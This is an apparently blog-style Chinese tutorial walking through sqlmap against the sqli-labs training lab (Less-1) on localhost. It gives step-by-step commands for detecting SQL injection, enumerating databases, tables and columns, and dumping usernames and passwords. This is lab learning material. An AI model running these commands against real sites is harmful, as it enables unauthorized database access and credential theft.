目录
(sqlmap)SQL注入基本步骤:
扩展
命令扩展
注:
推荐:
一、Less1(GET-Error based - Single quotes -String)
1.1、第一步:检测是否存在注入
基础操作
1.2、第二步:爆数据库名
命令
基础操作
1.3、第三步:爆数据库表名
命令
基础操作
1.4、第四步:爆字段名
命令:
基础操作
1.5、第五步:爆数据
命令:
基础操作:
(sqlmap)SQL注入基本步骤:
第一步:检测是否存在注入
第二步:爆数据库名
第三步:爆数据库表名
第四步:爆字段名
第五步:爆数据
扩展
命令扩展
(1)如果提前找到了数据库类型
--dbms +数据库
(2)扫描的等级
最高等级是
--leve=5 --risk=3
注:
我使用Windows中的sqlmap做,会带上python sqlmap.py
Linux:直接sqlmap +……
一、Less1(GET-Error based - Single quotes -String)
1.1、第一步:检测是否存在注入
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-1/?id=1' --batch
--batch是使用默认设置
其实环境都扫出来了
就可以再加上--dbms mysql了
1.2、第二步:爆数据库名
命令
#获取全部数据库
sqlmap.py -u url --dbs --batch
---------
#获取当前数据库
sqlmap.py -u url --current-dbs --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-1/?id=1' --dbs --batch
1.3、第三步:爆数据库表名
命令
python sqlmap.py -u url -D DB --tables --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-1/?id=1' -D security --tables --batch
1.4、第四步:爆字段名
命令:
sqlmap.py -u url -D DB -T TBL --columns --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-1/?id=1' -D security -T users --columns --batch
1.5、第五步:爆数据
命令:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
基础操作:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-1/?id=1' -D security -T users -C "username,password" --dump --batch
注:
(1-4关基本类似,就以第一关为例)